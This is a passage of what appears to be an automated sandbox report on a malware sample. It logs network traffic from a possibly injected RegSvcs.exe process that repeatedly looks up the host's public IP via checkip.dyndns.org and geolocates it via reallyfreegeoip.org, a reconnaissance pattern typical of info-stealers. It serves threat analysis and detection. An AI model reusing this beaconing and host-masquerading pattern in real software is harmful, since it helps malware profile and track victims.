Mar 11, 2025 09:59:47.795155048 CET	49735	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:47.795739889 CET	49735	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:47.799710989 CET	49734	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:47.800856113 CET	63654	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:47.806227922 CET	80	49734	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:47.806315899 CET	49734	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:47.807024956 CET	80	63654	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:47.807132959 CET	63654	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:47.807209969 CET	63654	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:47.813765049 CET	80	63654	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:48.588666916 CET	80	63654	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:48.590224981 CET	63655	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:48.590272903 CET	443	63655	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:48.590446949 CET	63655	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:48.590861082 CET	63655	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:48.590878963 CET	443	63655	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:48.636183977 CET	63654	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:50.507627010 CET	443	63655	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:50.513417959 CET	63655	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:50.513442039 CET	443	63655	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:51.104123116 CET	443	63655	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:51.104207039 CET	443	63655	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:51.104335070 CET	63655	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:51.109724998 CET	63655	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:51.168405056 CET	63654	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:51.169356108 CET	63656	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:51.174319029 CET	80	63654	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:51.174416065 CET	63654	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:51.175250053 CET	80	63656	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:51.175352097 CET	63656	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:51.187578917 CET	63656	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:51.192445040 CET	80	63656	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:51.974512100 CET	80	63656	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:51.979044914 CET	63657	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:51.979089975 CET	443	63657	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:51.979168892 CET	63657	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:51.979465008 CET	63657	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:51.979476929 CET	443	63657	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:52.026866913 CET	63656	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:53.645102978 CET	443	63657	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:53.646996975 CET	63657	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:53.647026062 CET	443	63657	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:54.227457047 CET	443	63657	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:54.227536917 CET	443	63657	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:54.227607965 CET	63657	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:54.228163958 CET	63657	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:54.231297016 CET	63656	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:54.232187986 CET	63658	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:54.236356974 CET	80	63656	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:54.236424923 CET	63656	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:54.237031937 CET	80	63658	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:54.237107992 CET	63658	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:54.237219095 CET	63658	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:54.241961956 CET	80	63658	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:55.035552979 CET	80	63658	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:55.037107944 CET	63659	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:55.037204027 CET	443	63659	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:55.037297010 CET	63659	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:55.037610054 CET	63659	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:55.037658930 CET	443	63659	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:55.089337111 CET	63658	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:56.732090950 CET	443	63659	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:56.734013081 CET	63659	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:56.734055996 CET	443	63659	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:57.243923903 CET	443	63659	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:57.244007111 CET	443	63659	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:57.244139910 CET	63659	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:57.244939089 CET	63659	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:57.443741083 CET	63658	80	192.168.2.4	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 09:59:31.883862972 CET	59341	53	192.168.2.4	1.1.1.1
Mar 11, 2025 09:59:31.892458916 CET	53	59341	1.1.1.1	192.168.2.4
Mar 11, 2025 09:59:33.240550995 CET	64295	53	192.168.2.4	1.1.1.1
Mar 11, 2025 09:59:33.258440971 CET	53	64295	1.1.1.1	192.168.2.4
Mar 11, 2025 09:59:45.942495108 CET	53	51577	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 11, 2025 09:59:31.883862972 CET	192.168.2.4	1.1.1.1	0x475c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.240550995 CET	192.168.2.4	1.1.1.1	0x6c0d	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 11, 2025 09:59:31.892458916 CET	1.1.1.1	192.168.2.4	0x475c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 11, 2025 09:59:31.892458916 CET	1.1.1.1	192.168.2.4	0x475c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:31.892458916 CET	1.1.1.1	192.168.2.4	0x475c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:31.892458916 CET	1.1.1.1	192.168.2.4	0x475c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:31.892458916 CET	1.1.1.1	192.168.2.4	0x475c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:31.892458916 CET	1.1.1.1	192.168.2.4	0x475c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 09:59:33.258440971 CET	1.1.1.1	192.168.2.4	0x6c0d	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49715	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:31.923639059 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 11, 2025 09:59:32.729234934 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 09:59:32.742024899 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 11, 2025 09:59:33.014009953 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 09:59:36.113143921 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 11, 2025 09:59:36.380815983 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49725	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:38.802426100 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 11, 2025 09:59:39.574865103 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49730	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:41.855869055 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 11, 2025 09:59:42.626250982 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:44.845052004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 11, 2025 09:59:45.627016068 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	63654	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:47.807209969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 11, 2025 09:59:48.588666916 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	63656	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:51.187578917 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 11, 2025 09:59:51.974512100 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	63658	132.226.8.169	80	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 11, 2025 09:59:54.237219095 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 11, 2025 09:59:55.035552979 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49717	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:36 UTC	858	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 95293 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 06:31:22 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBDMcgi1l1Hz8nj3OB8P71AdNtslFHs%2BEQhB3CccA9gqys4XYBPJU0YFt2EGdjpoP%2BMloCAlWHxsG647wCy0kobqWIfXX%2BD%2F0Qksg0y7sis40Keq6ahIZe8IJYayD9UIyKbcHTo2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9db4cdabe4509-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=32811&min_rtt=29838&rtt_var=11045&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=101387&cwnd=245&unsent_bytes=0&cid=6620d157f58a2db6&ts=615&x=0"
2025-03-11 08:59:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49720	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-03-11 08:59:38 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 95295 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 06:31:22 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQcqgcZSVrZh2pLRIzcLiqKblVS0EAYCSCRVdR1vRR%2FpI7IeH0mLTL41qHQYg2U%2BN%2FlYq75Zy%2Fv%2FjMBkPF5yPkC9EveaWFvBfl5CM7QxuAsZ2BAx2Y8NoKdueuVbKYG0XMerXrbb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9db5d4be3b085-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=36797&min_rtt=21638&rtt_var=27965&sent=7&recv=9&lost=0&retrans=1&sent_bytes=2972&recv_bytes=699&delivery_rate=57970&cwnd=252&unsent_bytes=0&cid=47ccfcfd6631958c&ts=540&x=0"
2025-03-11 08:59:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49727	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:41 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 95298 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 06:31:22 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gz1u29LfJ7Mly3ikL2SEQBfOXEPYx3YszQLCt5LwcsGu4BPqhWejBBzW20iuG3yIfQ4KkhVTb9%2Fk7okaFmIk1rNAn0lO6qQcKP%2Fg1zMqKLgamEjghMDQqTJ%2BlZ3Ggp7LeJJsk%2B%2B8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9db70eef47b94-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29423&min_rtt=25084&rtt_var=7346&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=135546&cwnd=250&unsent_bytes=0&cid=ac3236af82ac5d0e&ts=520&x=0"
2025-03-11 08:59:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
